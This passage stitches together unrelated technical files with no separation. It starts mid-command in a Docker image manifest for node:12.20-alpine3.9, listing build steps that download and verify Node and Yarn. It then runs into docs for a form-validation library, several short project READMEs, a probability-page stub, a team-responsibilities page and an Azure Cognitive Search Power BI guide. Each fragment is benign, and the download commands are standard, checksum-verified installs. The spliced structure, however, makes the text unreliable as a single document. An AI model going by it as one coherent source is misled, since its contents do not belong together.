    :::image type="content" source="media/search-monitor-logs-powerbi/powerbi-search.png" alt-text="Screenshot of the Azure Cognitive Search Power BI report.":::

## <a name="how-to-change-the-app-parameters"></a>How to change the app parameters

If you'd like to visualize data from a different storage account or change the number of days of data to query, follow the steps below to change the **Days** and **StorageAccount** parameters.

1. Navigate to your Power BI apps, find your Azure Cognitive Search app, and select the **Edit app** button to view the workspace.

    :::image type="content" source="media/search-monitor-logs-powerbi/azure-search-app-tile-edit.png" alt-text="Screenshot showing how to select the Edit app button for the Azure Cognitive Search app.":::

1. Select **Settings** from the dataset options.

    :::image type="content" source="media/search-monitor-logs-powerbi/workspace-view-select-settings.png" alt-text="Screenshot showing how to select Settings from the Azure Cognitive Search dataset options.":::

1. On the Datasets tab, change the parameter values and select **Apply**. If there's an issue with the connection, update the data source credentials on the same page.

1. Navigate back to the workspace and select **Refresh now** from the dataset options.
:::image type="content" source="media/search-monitor-logs-powerbi/workspace-view-select-refresh-now.png" alt-text="Screenshot, der zeigt, wie Sie „Jetzt aktualisieren“ aus den Azure Cognitive Search-Datasetoptionen auswählen"::: 1. Öffnen Sie den Bericht, um die aktualisierten Daten anzuzeigen. Möglicherweise müssen Sie den Bericht auch aktualisieren, um die neuesten Daten anzuzeigen. ## <a name="troubleshooting"></a>Problembehandlung Wenn Sie feststellen, dass Ihre Daten nicht angezeigt werden, befolgen Sie diese Schritte zur Problembehandlung: 1. Öffnen Sie den Bericht, und aktualisieren Sie die Seite, um sicherzustellen, dass Sie die neuesten Daten anzeigen. Der Bericht enthält eine Option zum Aktualisieren der Daten. Wählen Sie diese Option aus, um die neuesten Daten zu erhalten. 1. Stellen Sie sicher, dass der angegebene Speicherkontoname und der angegebene Zugriffsschlüssel korrekt sind. Der Speicherkontoname sollte dem Konto entsprechen, das mit ihren Suchdienstprotokollen konfiguriert wurde. 1. Vergewissern Sie sich, dass Ihr Speicherkonto die Container **insights-logs-operationlogs** und **insights-metrics-pt1m** und jeder Container Daten enthält. Die Protokolle und Metriken befinden sich in einigen Ordnerebenen. 1. Überprüfen Sie, ob das Dataset weiterhin aktualisiert wird. Der Aktualisierungsstatusindikator wird oben in Schritt 8 angezeigt. Wenn die Aktualisierung noch immer ausgeführt wird, warten Sie, bis die Aktualisierung beendet ist, um den Bericht zu öffnen und zu aktualisieren. ## <a name="next-steps"></a>Nächste Schritte [Weitere Informationen zu Azure Cognitive Search](./index.yml) [Was ist Power BI?](/power-bi/fundamentals/power-bi-overview) [Grundlegende Konzepte für Designer im Power BI-Dienst](/power-bi/service-basic-concepts)
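The portal steps above for enabling diagnostic logging can also be scripted. The command below is an illustrative Azure CLI sketch, not part of the original article; the diagnostic-setting name, subscription/resource IDs, and storage account name are placeholders you would substitute with your own values:

```
az monitor diagnostic-settings create \
  --name search-diagnostics \
  --resource "/subscriptions/<sub-id>/resourceGroups/<rg>/providers/Microsoft.Search/searchServices/<service-name>" \
  --storage-account <storage-account-name> \
  --logs '[{"category": "OperationLogs", "enabled": true}]' \
  --metrics '[{"category": "AllMetrics", "enabled": true}]'
```

After the command succeeds and the service has handled some traffic, the `insights-logs-operationlogs` and `insights-metrics-pt1m` containers described above should begin to appear in the storage account.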
86.542857
433
0.792891
deu_Latn
0.99308
6f6489ef4c65dbac84019dd0688df28b0a9b34f0
7,751
md
Markdown
README.md
brainhack-school2020/BHS_project_jonathan
b765eba4390342910336fc3b64af43a8db5ff6b7
[ "CC0-1.0" ]
null
null
null
README.md
brainhack-school2020/BHS_project_jonathan
b765eba4390342910336fc3b64af43a8db5ff6b7
[ "CC0-1.0" ]
3
2020-05-21T23:23:32.000Z
2020-06-04T19:23:23.000Z
README.md
brainhack-school2020/BHS_project_Jonathan
b765eba4390342910336fc3b64af43a8db5ff6b7
[ "CC0-1.0" ]
null
null
null
[![](https://img.shields.io/badge/Visit-our%20project%20page-ff69b4)](https://school.brainhackmtl.org/project/template) # Visualization of functional connectivity from multimodal neuroimaging data - Jonathan Team contributors: Jonathan Gallego, Brainhack School ![BrainHack School](bhs2020.png) ## Summary - Hi! I'm a first-year PhD student at McGill. My BHS project aimed to use some of the visualization tools we have learned to display functional connectivity results from both MEG and fMRI data. - I used data from 12 subjects from the Human Connectome Project (https://www.humanconnectome.org). - I would love to hear about other people's projects and see what they have achieved so far! Twitter: @jogaru1818 ### What I wanted to learn - To manage and analyze data in Python (since I have always worked in Matlab) - To use some specific tools for neuroimaging analysis (such as nilearn) - To try different visualization tools for displaying functional connectivity (that could be applicable to different neuroimaging modalities) - To "live the experience" of collaborating with others through GitHub ## Project definition ### Background - Although MEG and fMRI are very different signals, they both reflect some aspects of neuronal activity - Functional connectivity assesses the statistical dependence between the activity (time series) of different brain regions - After preprocessing the data individually, we can have both modalities in the same coordinate space, parcellate the brain according to a common atlas, and extract the MEG and fMRI time series of each brain region. - We could then compute connectivity measures and visualize the results from both modalities in parallel! ### Tools I employed - Human Connectome Dataset: as the open data repository I used for my BHS project - Git: to keep version control of my files - GitHub: to create a repository compiling all the resources employed for this project and make it reproducible. 
- Python: as the programming language I used to manipulate the data. - Jupyter notebook: as a resource to organize and document the code (with instructions and outputs) I used for my project. - Nilearn tools: as a tool for calculating and displaying functional connectivity from neuroimaging data - Brainstorm (for MEG processing). Works on Matlab. ### Data specifications For this project I used data from 12 subjects from the Human Connectome Project, including: - Preprocessed high-resolution anatomical MR scan - Preprocessed fMRI resting state data (session 1) - Unprocessed MEG resting state data - Unprocessed MEG noise recordings - Anatomical info for MEG registration. These data can be easily downloaded after creating an account and accessing the Human Connectome Project database (https://db.humanconnectome.org/). The HCP_data_dowload.md file contains a brief set of instructions on how to get the specific data used for this project ### Deliverables A GitHub repository containing a small set of md files and jupyter notebooks documenting all the requirements, instructions and code needed to reproduce this project. ### Progress overview and results 1 The first step was to install all the required software and libraries I needed for my project and to prepare the work environment. Detailed instructions on the requirements you need to fulfil to run the code and replicate these analyses are presented in the requirements.md file 2 After installing all the required dependencies and downloading the HCP data I started working on the MEG data. Since the already processed source-space MEG data available in the HCP database cannot be manipulated in many ways, I decided to download the raw data and preprocess it myself. 
I was very interested in learning to perform all these steps using some of the new tools we explored; however, I knew this would not be feasible given the limited time we had for our project, so I performed the preprocessing using software I am already familiar with (Brainstorm). Once I preprocessed the MEG data and performed a source estimation analysis, I extracted the time series of the 148 regions from the Destrieux atlas (2009) for each subject, concatenated them and exported them into a text file. The order of the labels of the scouts was consistent with that used for the fMRI analysis. The detailed step-by-step description of the MEG processing is contained in the MEG_processing.md file. 3 For the fMRI data, I opted to use the preprocessed images. I employed functions from nilearn to load the brain parcellations of the Destrieux atlas and the preprocessed fMRI data. As the HCP resting state fMRI consists of 1200 3D brain volumes, loading the whole dataset at the same time may cause memory saturation on a regular machine. Therefore, I segmented the nifti files into smaller chunks of data and created Python code to load one chunk at a time, extract the fMRI time series of each scout, concatenate the data for each subject and then across all subjects, and save it into a single matrix. The code used to extract the time series from the fMRI data is contained in the fMRI_timeseries.ipynb jupyter notebook. 4 After having extracted the MEG and fMRI time series from the scouts of the atlas, I wrote a simple piece of code to create a couple of interactive figures to display the functional connectivity matrices and graphs I obtained from the data. These interactive figures allow you to easily navigate through the data from all subjects and switch between modalities. The final output of steps 2 and 3 is stored in the all_subjects_time_series_meg.txt and all_subjects_time_series_fmri.txt files, which contain the extracted time series of all subjects, for each modality. 
This last step loads these files and uses a combination of nilearn tools and ipywidgets to create and display an interactive figure within a jupyter notebook. An example of the fMRI connectivity matrix of Subject 1 ![fMRI_example_matrix](fmri_matrix_example.png) An example of the MEG delta band connectivity matrix of Subject 1 ![MEG_matrix_example](meg_matrix_example.png) ## Conclusion and acknowledgement During the last weeks I spent a lot of time getting familiar with these new tools. I knew I would face many problems and that most of the time I would be looking at documentation files or forums trying to debug things. However, in the end I feel happy with the final result, given that I learned a lot of new cool things and that this represents a first step towards adopting these practices in my daily work. I finally took the time to learn the basics of Python and now I will be able to use the rich variety of libraries it offers for analyzing and visualizing data. I also plan to adopt the use of virtual environments and containers for future projects. I also learned to document my work using git and to collaborate with other people through GitHub, which are both valuable resources to promote scientific reproducibility. Overall, I believe this was a great and useful experience for me, and I will definitely start using some of these tools to improve my practices as a student and future researcher I would like to acknowledge all the BHS organizers for investing their time and effort in developing this magnificent course! 
I would also like to thank my clinic instructors for assessing me during my project (Valentina, Tristan and Pierre) and all my peers from this BHS edition for sharing their comments and ideas throughout these weeks ## LINK TO WEEK 3 DELIVERABLE Here is the link for the notebook containing the code to generate the interactive figure produced as the deliverable for week 3 https://github.com/brainhack-school2020/jogaru1818_BHS/blob/master/week_3_derivable_Jonathan_Gallego.ipynb
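The connectivity figures described above are built from correlations between regional time series. As a minimal, self-contained sketch of that computation (plain NumPy with made-up data, not the project's actual nilearn/Brainstorm code; the real analysis used 148 Destrieux regions per subject):

```python
import numpy as np

# Toy stand-in for extracted regional time series:
# rows are time points, columns are brain regions.
rng = np.random.default_rng(0)
n_timepoints, n_regions = 200, 6
time_series = rng.standard_normal((n_timepoints, n_regions))

# Functional connectivity as the pairwise Pearson correlation between regions.
conn_matrix = np.corrcoef(time_series.T)

print(conn_matrix.shape)  # (6, 6): one entry per region pair
```

The resulting matrix is symmetric with ones on the diagonal, which is what the per-subject, per-modality connectivity-matrix figures above display.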
88.079545
1,009
0.808799
eng_Latn
0.999422
6f64a9ae8a91d74737f05fef29096843a6fda412
72
md
Markdown
README.md
isaac-nadar/track-trace-mobileApp
c8c70c14c83060db2b790745286ff9051ad66d99
[ "MIT" ]
null
null
null
README.md
isaac-nadar/track-trace-mobileApp
c8c70c14c83060db2b790745286ff9051ad66d99
[ "MIT" ]
null
null
null
README.md
isaac-nadar/track-trace-mobileApp
c8c70c14c83060db2b790745286ff9051ad66d99
[ "MIT" ]
null
null
null
# track-trace-mobileApp An app for shipment tracking made with flutter.
24
47
0.805556
eng_Latn
0.986354
6f650c6efa3cb646cab19f61176ee632fb41b995
8,449
md
Markdown
CHANGELOG.md
ju-sh/vulture
48f4b3ded26eeb83131fa12caf0b0522e9f14135
[ "MIT" ]
null
null
null
CHANGELOG.md
ju-sh/vulture
48f4b3ded26eeb83131fa12caf0b0522e9f14135
[ "MIT" ]
null
null
null
CHANGELOG.md
ju-sh/vulture
48f4b3ded26eeb83131fa12caf0b0522e9f14135
[ "MIT" ]
null
null
null
# unreleased * Only parse format strings when being used with `locals()` (jingw, #225). * Don't override paths in pyproject.toml with empty CLI paths (bcbnz, #228). * Run continuous integration tests for Python 3.9 (ju-sh, #232). * Use pathlib internally (ju-sh, #226). # 2.1 (2020-08-19) * Treat `getattr/hasattr(obj, "constant_string", ...)` as a reference to `obj.constant_string` (jingw, #219). * Fix false positives when assigning to `x.some_name` but reading via `some_name`, at the cost of potential false negatives (jingw, #221). * Allow reading options from `pyproject.toml` (Michel Albert, #164, #215). # 2.0 (2020-08-11) * Parse `# type: ...` comments if on Python 3.8+ (jingw, #220). * Bump minimum Python version to 3.6 (Jendrik Seipp, #218). The last Vulture release that supports Python 2.7 and Python 3.5 is version 1.6. * Consider all files under `test` or `tests` directories test files (Jendrik Seipp). * Ignore `logging.Logger.propagate` attribute (Jendrik Seipp). # 1.6 (2020-07-28) * Differentiate between functions and methods (Jendrik Seipp, #112, #209). * Move from Travis to GitHub actions (RJ722, #211). # 1.5 (2020-05-24) * Support flake8 "noqa" error codes F401 (unused import) and F841 (unused local variable) (RJ722, #195). * Detect unreachable code in conditional expressions (Agathiyan Bragadeesh, #178). # 1.4 (2020-03-30) * Ignore unused import statements in `__init__.py` (RJ722, #192). * Report first decorator's line number for unused decorated objects on Python 3.8+ (RJ722, #200). * Check code with black and pyupgrade. # 1.3 (2020-02-03) * Detect redundant 'if' conditions without 'else' blocks. * Add whitelist for `string.Formatter` (Joseph Bylund, #183). # 1.2 (2019-11-22) * Fix tests for Python 3.8 (#166). * Use new `Constant` AST node under Python 3.8+ (#175). * Add test for f-strings (#177). * Add whitelist for `logging` module. # 1.1 (2019-09-23) * Add `sys.excepthook` to `sys` whitelist. * Add whitelist for `ctypes` module. 
* Check that type annotations are parsed and type comments are ignored (thanks @kx-chen). * Support checking files with BOM under Python 2.7 (#170). # 1.0 (2018-10-23) * Add `--ignore-decorators` flag (thanks @RJ722). * Add whitelist for `threading` module (thanks @andrewhalle). # 0.29 (2018-07-31) * Add `--ignore-names` flag for ignoring names matching the given glob patterns (thanks @RJ722). # 0.28 (2018-07-05) * Add `--make-whitelist` flag for reporting output in whitelist format (thanks @RJ722). * Ignore case of `--exclude` arguments on Windows. * Add `*-test.py` to recognized test file patterns. * Add `failureException`, `longMessage` and `maxDiff` to `unittest` whitelist. * Refer to actual objects rather than their mocks in default whitelists (thanks @RJ722). * Don't import any Vulture modules in setup.py (thanks @RJ722). # 0.27 (2018-06-05) * Report `while (True): ... else: ...` as unreachable (thanks @RJ722). * Use `argparse` instead of `optparse`. * Whitelist Mock.return\_value and Mock.side\_effect in unittest.mock module. * Drop support for Python 2.6 and 3.3. * Improve documentation and test coverage (thanks @RJ722). # 0.26 (2017-08-28) * Detect `async` function definitions (thanks @RJ722). * Add `Item.get_report()` method (thanks @RJ722). * Move method for finding Python modules out of Vulture class. # 0.25 (2017-08-15) * Detect unsatisfiable statements containing `and`, `or` and `not`. * Use filenames and line numbers as tie-breakers when sorting by size. * Store first and last line numbers in Item objects. * Pass relevant options directly to `scavenge()` and `report()`. # 0.24 (2017-08-14) * Detect unsatisfiable `while`-conditions (thanks @RJ722). * Detect unsatisfiable `if`- and `else`-conditions (thanks @RJ722). * Handle null bytes in source code. # 0.23 (2017-08-10) * Add `--min-confidence` flag (thanks @RJ722). # 0.22 (2017-08-04) * Detect unreachable code after `return`, `break`, `continue` and `raise` (thanks @RJ722). 
* Parse all variable and attribute names in new format strings. * Extend ast whitelist. # 0.21 (2017-07-26) * If an unused item is defined multiple times, report it multiple times. * Make size estimates for function calls more accurate. * Create wheel files for Vulture (thanks @RJ722). # 0.20 (2017-07-26) * Report unused tuple assignments as dead code. * Report attribute names that have the same names as variables as dead code. * Let Item class inherit from `object` (thanks @RJ722). * Handle names imported as aliases like all other used variable names. * Rename Vulture.used\_vars to Vulture.used\_names. * Use function for determining which imports to ignore. * Only try to import each whitelist file once. * Store used names and used attributes in sets instead of lists. * Fix estimating the size of code containing ellipses (...). * Refactor and simplify code. # 0.19 (2017-07-20) * Don't ignore `__foo` variable names. * Use separate methods for determining whether to ignore classes and functions. * Only try to find a whitelist for each defined import once (thanks @roivanov). * Fix finding the last child for many types of AST nodes. # 0.18 (2017-07-17) * Make `--sort-by-size` faster and more accurate (thanks @RJ722). # 0.17 (2017-07-17) * Add `get_unused_code()` method. * Return with exit code 1 when syntax errors are found or files can't be read. # 0.16 (2017-07-12) * Differentiate between unused classes and functions (thanks @RJ722). * Add --sort-by-size option (thanks @jackric and @RJ722). * Count imports as used if they are accessed as module attributes. # 0.15 (2017-07-04) * Automatically include whitelists based on imported modules (thanks @RJ722). * Add --version parameter (thanks @RJ722). * Add appveyor tests for testing on Windows (thanks @RJ722). 
# 0.14 (2017-04-06) * Add stub whitelist file for Python standard library (thanks @RJ722) * Ignore class names starting with "Test" in "test\_" files (thanks @thisch). * Ignore "test\_" functions only in "test\_" files. # 0.13 (2017-03-06) * Ignore star-imported names since we cannot detect whether they are used. * Move repository to GitHub. # 0.12 (2017-01-05) * Detect unused imports. * Use tokenize.open() on Python \>= 3.2 for reading input files, assume UTF-8 encoding on older Python versions. # 0.11 (2016-11-27) * Use the system's default encoding when reading files. * Report syntax errors instead of aborting. # 0.10 (2016-07-14) * Detect unused function and method arguments (issue #15). * Detect unused \*args and \*\*kwargs parameters. * Change license from GPL to MIT. # 0.9 (2016-06-29) * Don't flag attributes as unused if they are used as global variables in another module (thanks Florian Bruhin). * Don't consider "True" and "False" variable names. * Abort with error message when invoked on .pyc files. # 0.8.1 (2015-09-28) * Fix code for Python 3. # 0.8 (2015-09-28) * Do not flag names imported with "import as" as dead code (thanks Tom Terrace). # 0.7 (2015-09-26) * Exit with exitcode 1 if path on commandline can't be found. * Test vulture with vulture using a whitelist module for false positives. * Add tests that run vulture as a script. * Add "python setup.py test" command for running tests. * Add support for tox. * Raise test coverage to 100%. * Remove ez\_setup.py. # 0.6 (2014-09-06) * Ignore function names starting with "test\_". * Parse variable names in new format strings (e.g. "This is {x}".format(x="nice")). * Only parse alphanumeric variable names in format strings and ignore types. * Abort with exit code 1 on syntax errors. * Support installation under Windows by using setuptools (thanks Reuben Fletcher-Costin). # 0.5 (2014-05-09) * If dead code is found, exit with 1. 
# 0.4.1 (2013-09-17) * Only warn if a path given on the command line cannot be found. # 0.4 (2013-06-23) * Ignore unused variables starting with an underscore. * Show warning for syntax errors instead of aborting directly. * Print warning if a file cannot be found. # 0.3 (2012-03-19) * Add support for python3 * Report unused attributes * Find tuple assignments in comprehensions * Scan files given on the command line even if they don't end with .py # 0.2 (2012-03-18) * Only format nodes in verbose mode (gives 4x speedup). # 0.1 (2012-03-17) * First release.
30.723636
76
0.715588
eng_Latn
0.976759
6f6536525632712c14f5d72877794f5910cd1770
4,970
markdown
Markdown
_posts/2018-11-05-welcome-to-jekyll.markdown
mlegin-hll/mlegin-hll.github.io
986c1baa083685f49212f03ee5d077204bd6389f
[ "MIT" ]
null
null
null
_posts/2018-11-05-welcome-to-jekyll.markdown
mlegin-hll/mlegin-hll.github.io
986c1baa083685f49212f03ee5d077204bd6389f
[ "MIT" ]
7
2018-12-02T21:57:14.000Z
2018-12-04T10:05:55.000Z
_posts/2018-11-05-welcome-to-jekyll.markdown
mlegin-hll/mlegin-hll.github.io
986c1baa083685f49212f03ee5d077204bd6389f
[ "MIT" ]
null
null
null
--- layout: post title: "Installing Jekyll!" date: 2018-11-07 21:40:36 -0500 categories: jekyll update author: wangxiaofeng@hualala.com tags: jekyll markdown --- # 1. Introduction to Jekyll Jekyll is a simple, free blog generation tool. You can think of it as a tool that turns markdown files into a static website, and it can be deployed on GitHub for free. Combined with GitHub Pages, we can view our markdown "static website" on our own github.io. [jekyll-docs]: https://jekyllrb.com/docs/home [jekyll-gh]: https://github.com/jekyll/jekyll [jekyll-talk]: https://talk.jekyllrb.com/ # 2. Installation Clone the project locally ``` git clone http://git.hualala.com/hualala_mall/jekyllBlog ``` Install and start Jekyll ``` gem install jekyll //no gem? please google how to set up a Ruby environment yourself gem install bundler //Bundler is a tool for managing gem dependencies gem install minima //theme jekyll -v //check the version bundle //install the dependent gem files bundle exec jekyll server //enter the project directory and start the local server ``` Open a browser and enter `127.0.0.1:4000` to see the result ### Troubleshooting installation errors Running the jekyll command reports an error ``` /System/Library/Frameworks/Ruby.framework/Versions/2.3/usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require': cannot load such file -- bundler (LoadError) ``` Cause: bundler is not installed. Solution (the command needs sudo): ``` gem install bundler ``` If the error persists ``` /System/Library/Frameworks/Ruby.framework/Versions/2.3/usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require': cannot load such file -- bundler (LoadError) ``` Fix ``` gem install minima ``` Running jekyll serve reports an error ``` WARN: Unresolved specs during Gem::Specification.reset: rouge (< 4, >= 1.7) WARN: Clearing out unresolved specs. Please report a bug if this causes problems. /usr/local/lib/ruby/gems/2.4.0/gems/bundler-1.17.1/lib/bundler/spec_set.rb:91:in `block in materialize': Could not find concurrent-ruby-1.1.3 in any of the sources (Bundler::GemNotFound) from /usr/local/lib/ruby/gems/2.4.0/gems/bundler-1.17.1/lib/bundler/spec_set.rb:85:in `map!' 
from /usr/local/lib/ruby/gems/2.4.0/gems/bundler-1.17.1/lib/bundler/spec_set.rb:85:in `materialize' from /usr/local/lib/ruby/gems/2.4.0/gems/bundler-1.17.1/lib/bundler/definition.rb:170:in `specs' from /usr/local/lib/ruby/gems/2.4.0/gems/bundler-1.17.1/lib/bundler/definition.rb:237:in `specs_for' from /usr/local/lib/ruby/gems/2.4.0/gems/bundler-1.17.1/lib/bundler/definition.rb:226:in `requested_specs' from /usr/local/lib/ruby/gems/2.4.0/gems/bundler-1.17.1/lib/bundler/runtime.rb:108:in `block in definition_method' from /usr/local/lib/ruby/gems/2.4.0/gems/bundler-1.17.1/lib/bundler/runtime.rb:20:in `setup' from /usr/local/lib/ruby/gems/2.4.0/gems/bundler-1.17.1/lib/bundler.rb:107:in `setup' from /usr/local/lib/ruby/gems/2.4.0/gems/jekyll-3.8.5/lib/jekyll/plugin_manager.rb:50:in `require_from_bundler' from /usr/local/lib/ruby/gems/2.4.0/gems/jekyll-3.8.5/exe/jekyll:11:in `<top (required)>' from /usr/local/bin/jekyll:22:in `load' from /usr/local/bin/jekyll:22:in `<main>' ``` Solution: delete Gemfile.lock # 3. Usage - Adding posts: posts all go in the _posts directory, and the filename must strictly follow the year-month-day-title.markdown/md format. The file header follows the default format ``` --- layout: post title: "post title" // post title date: 2018-11-29 09:56:49 +0800 categories: js react react-native //post category info tags: markdown --- ``` - Committing a post: ``` git commit -am 'your new blog title' git push ``` - Using images in Jekyll ``` [image pic1]({{ "/assets/images4post/pic1.jpg" | absolute_url }}) The syntax for referencing an image in the assets directory from a post under the Jekyll framework (absolute path) is as follows: ![image pic1]({{ "/assets/images4post/pic1.jpg" | absolute_url }}) ``` [image pic1]({{ "/assets/img/hero.jpg"}}) Example ![](/assets/img/hero.jpg) - Using tags (changed on 12-3 when switching to the h2o theme) ``` --- layout: post title: "post title" // post title date: 2018-11-29 09:56:49 +0800 categories: js react react-native //post category info tags: markdown --- ``` The h2o theme automatically recognizes and extracts tag categories; just add tags as shown above # 4. Integrating Disqus comments (12-3) The mainstream third-party comment systems today include Gitalk, Disqus, and so on. Gitalk is written by Chinese developers; it uses a GitHub OAuth app to obtain read/write access to a GitHub repo so that the repo's issues can be used in the blog. Our system is not hosted on public GitHub, so this plugin is hard to use. Disqus is a third-party plugin written abroad that provides comment functionality, but you need to get over the firewall to use it, otherwise it is not visible. The integration steps are as follows: 1. 
Register with Disqus and get your shortname ([reference link](https://damoqiongqiu.github.io/jekyll/2017/07/07/%E5%88%A9%E7%94%A8github%E5%92%8Cjekyll%E6%90%AD%E5%BB%BA%E4%B8%AA%E4%BA%BABlog-12.html); requires getting over the firewall) 2. Integrate it in Jekyll's h2o theme - In _config.yml ``` # Comments comments: disqus: true disqus_url: 'https://leginm.disqus.com/embed.js' ``` - In _layouts/_post ``` {% if site.comments.disqus %} <section class="post-footer-item comment"> <div id="disqus_thread"></div> </section> {% endif %} ``` ``` {% if site.comments.disqus %} <script> /* var disqus_config = function () { this.page.url = PAGE_URL; // Replace PAGE_URL with your page's canonical URL variable this.page.identifier = PAGE_IDENTIFIER; // Replace PAGE_IDENTIFIER with your page's unique identifier variable }; */ (function() { // DON'T EDIT BELOW THIS LINE var d = document, s = d.createElement('script'); s.src = 'https://md-22city-cn.disqus.com/embed.js'; s.setAttribute('data-timestamp', +new Date()); (d.head || d.body).appendChild(s); })(); </script> {% endif %} ``` The file structure is already written; just change the corresponding parameters. done~ [Markdown Cheatsheet](https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet)
24.243902
186
0.704225
yue_Hant
0.399035
6f65bcd8bc51961635bdb4c6a58efa95b6da5120
697
md
Markdown
README.md
yves-ledermann/ESP8266-Homie-SolarRoof
741919e9ccd1e54350bc5ab7101ffcdccd5c6f16
[ "MIT" ]
2
2017-02-13T01:58:42.000Z
2017-02-13T01:58:44.000Z
README.md
yves-ledermann/ESP8266-Homie-SolarRoof
741919e9ccd1e54350bc5ab7101ffcdccd5c6f16
[ "MIT" ]
null
null
null
README.md
yves-ledermann/ESP8266-Homie-SolarRoof
741919e9ccd1e54350bc5ab7101ffcdccd5c6f16
[ "MIT" ]
null
null
null
# esp8266_Homie-SolarRoof Firmware for the esp8266 PlatformIO build environment. ESP8266-powered node with some OneWire temperature sensors, LDR, DHT22, BMP280 Homie Framework, Modbus TCP Slave (for easy connection with a codesys PLC) TO DO: - Node for DHT22 - Node for BMP180 - Node for LDR Resistor - Dynamic Homie Nodes for each Temp Sensor - Modbus Holding Registers with all Values - clean up the code - separate nodes from the main project for easier maintenance & reuse //TO-DO // Set Alarms // Sensor.setHighAlarmTemp(sensorValues.Address, 30); //Sensor.setLowAlarmTemp(sensorValues.Address, 22); Got a lot of code from https://github.com/euphi/ Thank you @euphi *** need to write more text***
24.892857
78
0.76901
eng_Latn
0.737599
6f6622765952489ba566dbcc3672e79ef7cca404
4,465
md
Markdown
README_of_double_click_trigger_feature.md
Paper-Folding/baguetteBox.js
8040cb9df8f008305332664dd1f757fa2d183d5b
[ "MIT" ]
null
null
null
README_of_double_click_trigger_feature.md
Paper-Folding/baguetteBox.js
8040cb9df8f008305332664dd1f757fa2d183d5b
[ "MIT" ]
null
null
null
README_of_double_click_trigger_feature.md
Paper-Folding/baguetteBox.js
8040cb9df8f008305332664dd1f757fa2d183d5b
[ "MIT" ]
1
2022-03-14T10:29:53.000Z
2022-03-14T10:29:53.000Z
# baguetteBox.js - With Double Click Trigger Option Added

## _Modified by Paper-Folding_

## __[DECLARE]__

This project is forked from <https://github.com/feimosi/baguetteBox.js> and modified to add double click trigger functionality.

## __Documentation goes below:__

## To enable the double click trigger function, you just need to:

> ### 1. Add the attribute `bagDblClick` to every `<a>` tag that originally opens baguetteBox.
> ### 2. Then set the `dblTrigger` option to `true` like below:
> ```javascript
> baguetteBox.run('.grid', {
>     dblTrigger: true
> });
> ```
> ### __[IMPORTANT] Do not apply `href` to the `<a>` tag (or use `href='javascript:void(0)'` instead, if you want to enable the single click feature; see step 3 below).__
> ### 3. __[Optional]__ Steps 1 and 2 above are enough to trigger baguetteBox by double clicking images. But you may still want single clicks on images to do other things. In that case, first add the option `singleClickCallBack` and assign a function to it like below:
> ```javascript
> baguetteBox.run('.grid', {
>     dblTrigger: true,
>     singleClickCallBack: function (event, someParameters) { doSomething(event, 'Oh you pressed me!'); }
> });
> ```
> ### Then define this `doSomething` function like this:
> ```javascript
> function doSomething(event, msg) {
>     console.log(event.srcElement.src); // the 'event' parameter here is the event object the browser provides to the listener; you can get quite a lot of info from it. For example, this line prints the image's src attribute to the console when the user single-clicks it.
>     console.log(msg); // this 'msg' is defined by you; you can pass anything to it and even add more parameters to the function itself.
> }
> ```
> ### Keep in mind that if you set `dblTrigger` to `false`, meaning the double click trigger feature is not enabled, setting `singleClickCallBack` will have no effect.
> ### __[Tip]__ You can define the timeout value that differentiates a double click from a single click by setting the `doubleClickJudgeTimeout` option. If two successive clicks on an image have a time difference less than its value, they will be regarded as a double click; otherwise each is a single click. This option's value is measured in milliseconds.
> ### Below is a full example (unrelated parts omitted):
> ### __HTML__
> ```html
> <div class="grid">
>     <a href="javascript:void(0)" dblHref="img/2-1.jpg">
>         <img src="img/thumbnails/2-1.jpg" alt="First image">
>     </a>
>     <a href="javascript:void(0)" dblHref="img/2-2.jpg">
>         <img src="img/thumbnails/2-2.jpg" alt="Second image">
>     </a>
>     ...
> </div>
> ```
> ### __JS__
> ```javascript
> baguetteBox.run('.grid', {
>     dblTrigger: true,
>     singleClickCallBack: function (event, someParameters) { doSomething(event, 'Oh you pressed me!'); },
>     doubleClickJudgeTimeout: 200
> });
>
> function doSomething(event, msg) {
>     console.log(event.srcElement.src);
>     console.log(msg);
> }
> ```
> ### 4. __[Optional]__ If you still want single click to trigger baguetteBox, just do what the original developers said in their version (you do not need to set `dblTrigger`; by default its value is `false`). An example follows, as you would see in the original developers' version.
> ### __HTML__
> ```html
> <div class="grid">
>     <a href="img/2-1.jpg">
>         <img src="img/thumbnails/2-1.jpg" alt="First image">
>     </a>
>     <a href="img/2-2.jpg">
>         <img src="img/thumbnails/2-2.jpg" alt="Second image">
>     </a>
>     ...
> </div>
> ```
> ### __JS__
> ```javascript
> baguetteBox.run('.grid', {});
> ```

## Trivia

### Q: _Why did I abandon `href` as the double click trigger?_

### A: _Because if `href` were still applied to the `<a>` tag, it would still trigger its default behaviors (like jumping to another page, flying to an anchor, and so on) every time, even when the user double clicked it. But the `<a>` tag can respond to the click event too, which is why I recommend removing the `href` from every `<a>` tag that opens baguetteBox by double clicking._

### __[Tip]__: Do not use `dblHref` and `href` at the same time when the double trigger feature is enabled; if you insist on using `href`, set its value to `javascript:void(0)`.

## For a complete example of my modification, see this [double click demo file](/demo/doubleClickExample.html) for detail.
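The `doubleClickJudgeTimeout` behavior described above can be illustrated with a small framework-free sketch. This is not baguetteBox's internal code; the helper name `makeClickJudge` is my own, and the 200 ms threshold simply mirrors the README example.

```javascript
// Sketch of the doubleClickJudgeTimeout idea: two clicks closer together
// than the timeout count as a double click; otherwise each is a single click.
function makeClickJudge(doubleClickJudgeTimeout) {
  let lastClickTime = null;
  return function judge(clickTime) {
    const isDouble =
      lastClickTime !== null &&
      clickTime - lastClickTime < doubleClickJudgeTimeout;
    lastClickTime = clickTime;
    return isDouble ? 'double' : 'single';
  };
}

const judge = makeClickJudge(200);
console.log(judge(0));    // 'single' - first click ever
console.log(judge(150));  // 'double' - 150 ms later, under the threshold
console.log(judge(600));  // 'single' - 450 ms gap, over the threshold
```

In a real handler the click timestamps would come from the browser's event objects rather than being passed in by hand.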
55.8125
368
0.680403
eng_Latn
0.977221
6f66d156dc2f2209426ec7576edc69d8f16835e3
1,380
md
Markdown
windows.web.http/httpclient_trygetinputstreamasync_434735070.md
embender/winrt-api
c3d1c5e6000fa7b06ed691e0bb48386f54c488c5
[ "CC-BY-4.0", "MIT" ]
null
null
null
windows.web.http/httpclient_trygetinputstreamasync_434735070.md
embender/winrt-api
c3d1c5e6000fa7b06ed691e0bb48386f54c488c5
[ "CC-BY-4.0", "MIT" ]
null
null
null
windows.web.http/httpclient_trygetinputstreamasync_434735070.md
embender/winrt-api
